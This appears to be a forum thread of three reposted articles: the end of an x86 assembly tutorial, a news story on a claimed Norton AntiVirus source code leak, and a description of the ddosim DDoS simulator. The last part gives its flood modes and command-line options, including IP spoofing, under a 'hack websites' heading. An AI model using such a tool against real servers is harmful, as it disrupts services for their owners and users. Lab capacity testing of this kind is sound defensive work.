mnemonics you don’t know, it’s usually as simple as googling them. That’s all I’ve ever done, and there is so much information about x86 assembler floating about on the interweb that you should have little trouble deciphering it. I found a super helpful webpage that covers the x86 registers in some detail: The Art of Picking Intel Registers Here’s a link to a page to download a .pdf x86 “cheat sheet”: Intel Assembler CodeTable 80x86 - Overview of instructions (Cheat Sheet) And the obvious wikipedia page: http://en.wikipedia.org/wiki/X86_instruction_listings And a beefy link also linked from wikipedia: http://home.comcast.net/~fbui/intel.html Summary Whilst very few programmers will ever need to write assembler, all game programmers will – sooner or later – find it to their advantage to be able to read and make some sense of it. It’s amazing what you can figure out with only a partial knowledge of assembler and how it maps to C++ code. The example code we looked at was, as I’ve already admitted, very simple. The point of this first post wasn’t to give you answers, but to show that the disassembly window is only daunting if you let it be; and to encourage you to explore what your compiler is doing with the code you give it. Don’t give up just because you don’t understand what you’re seeing yet; google it or post a specific question somewhere like Stack Overflow Epilogue I guess there are a few other things that I’d like to draw your attention to a few other things that I think are there to take away from this tiny snippet of disassembly: the C++ concept of a variable (or any other language’s concept of a variable for that matter) doesn’t exist at the assembler level. In assembler the values of x, y, and z are stored in specific memory addresses, and the CPU gets at them by explicit use of their respective memory addresses. The high level language concept of a variable, whilst easier to think about, is actually already an abstracted concept identifying a value in a memory address. note that in order to do anything “interesting” (e.g. add a value to another) the CPU needs to have at least part of the data it is operating on in a register (I’m sure some that some CPUs must be able to operate directly on memory, but it’s certainly not the usual way of doing things). Finally, I feel that this extremely simple example illustrates what I think is one of the most important facts about programming: High level languages exist only to make life easy for humans, they’re not any kind of accurate reflection of how CPUs actually work – in fact even assembler is a human convenience compared to the actual binary opcodes that the mnemonics (e.g. mov, add etc.) represent. My advice is don’t think about the actual opcodes too much, and definitely don’t worry about the electrons or the silicon Sursa: A Low Level Curriculum for C and C++
-
[h=1]Norton AntiVirus source code leaked to hackers?[/h] Story updated; please see below. By Suzanne Choney A group of Indian hackers say they have obtained the source code for Norton AntiVirus software, as well as "confidential documentation," that they will share on websites for all to see. The group, which calls themselves "The Lords of Dharmaraja," said it plans to publish the information on several different websites, "since we experience extreme pressure and censorship from US and India government agencies." It shared some of the information — some of which appears several years old — and a statement on the PasteBin file-sharing site. The original post was deleted, but a version is available to be seen via Google's cache of it. A cached version of the group's statement about Norton AntiVirus source code and documentation. If the hackers really do have Symantec’s source code — which at the moment remains only a claim — and release it to the world, the impact could be devastating to both the firm and to millions of users. Virus writers armed with source code would have a much easier time writing malicious programs that would evade Norton’s protection. Symantec, which owns Norton, said in a statement to msnbc.com that it is "investigating claims of our source code being disclosed externally." "The first claim pertained to Norton Antivirus code; however, our investigation confirmed it was a document from 12 years ago saying how the solution worked," Symantec said in the statement. "No source code was disclosed. As for the second claim of additional code, we are still analyzing the information." The company's "first priority is to make sure that any customer information remains protected," and so far, Symantec said, "we have not detected any inordinate or suspicious rates of traffic or activity going in or out of our networks." Updated, 9 p.m. PT: Symantec says that "a segment" of the source code used in two of its "older enterprise products has been accessed, one of which has been discontinued. The code involved is four and five years old. This does not affect Symantec’s Norton products for our consumer customers." The company says its network "was not breached, but rather that of a third party entity. We are still gathering information on the details and are not in a position to provide specifics on the third party involved. Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time." Msnbc.com's Bob Sullivan contributed to this report. Sursa: Technolog - Norton AntiVirus source code leaked to hackers?
-
ddosim v0.2 (Application Layer DDOS Simulator) Jan 13, 2012 Hack websites by using ddosim v0.2 (Application Layer DDOS Simulator) DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. HTTP server). Can be used only in a laboratory environment to test the capacity of the target server to handle application specific DDOS attacks. Features HTTP DDoS with valid requests HTTP DDoS with invalid requests (similar to a DC++ attack) SMTP DDoS TCP connection flood on random port In order to simulate such an attack in a lab environment we need to setup a network like this: On the victim machine ddosim creates full TCP connections – which are only simulated connections on the attacker side. There are a lot of options that make the tool quite flexible: Usage: ./ddosim -d IP Target IP address -p PORT Target port [-k NET] Source IP from class C network(ex. 10.4.4.0) [-i IFNAME] Output interface name [-c COUNT] Number of connections to establish [-w DELAY] Delay (in milliseconds) between SYN packets [-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO [-t NRTHREADS] Number of threads to use when sending packets (default 1) [-n] Do not spoof source address (use local address) [-v] Verbose mode (slower) [-h] Print this help message Source: hack websites by using ddosim v0.2 (Application Layer DDOS Simulator) Sursa: Computer Security Blog | Learning The Offensive Security: ddosim v0.2 (Application Layer DDOS Simulator)